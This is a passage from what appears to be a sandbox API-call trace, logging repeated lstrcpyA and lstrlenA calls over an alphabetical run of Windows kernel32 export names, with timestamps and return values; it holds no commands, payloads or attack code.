(lpString="CLOSECONSOLEHANDLE") returned 18 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.991] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.991] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.991] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.991] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.991] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.991] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.991] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.991] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.991] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.991] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.992] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.992] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.992] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.992] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.992] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.992] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.992] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.992] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.992] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.992] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.992] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.992] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.992] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.992] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.992] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.993] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.993] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.993] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.993] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.993] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.993] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.993] lstrlenA (lpString="COPYFILEA") returned 9 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.993] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.993] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.993] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.993] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.993] lstrlenA (lpString="COPYFILEW") returned 9 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.993] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.993] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.993] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.993] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.993] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.993] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.993] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.994] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.994] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.994] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.994] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.994] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.994] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.994] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.994] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.994] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.994] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.994] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.994] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.994] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.994] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.994] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.994] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.994] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.994] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.994] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.994] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.995] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.995] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.995] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.995] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.995] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.995] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.995] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.995] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.995] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.995] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.995] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.995] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.995] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.995] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.995] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.995] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.995] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.995] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.995] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.996] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.996] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.996] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.996] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.996] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.996] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.996] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.996] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.996] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.996] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.996] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.996] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.996] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.996] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.996] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.996] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.996] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.996] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.996] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.996] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.997] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.997] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.997] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.997] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.997] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.997] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.997] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.997] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.997] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.997] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.997] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.997] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.997] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.997] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.997] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.997] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.997] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.997] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.997] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.998] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.998] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.998] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.998] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.998] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.998] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.998] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.998] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.998] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.998] lstrlenA (lpString="DELETEATOM") returned 10 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.998] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.998] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.998] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.998] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.998] lstrcpyA (in: lpString1=0x36fda9c, 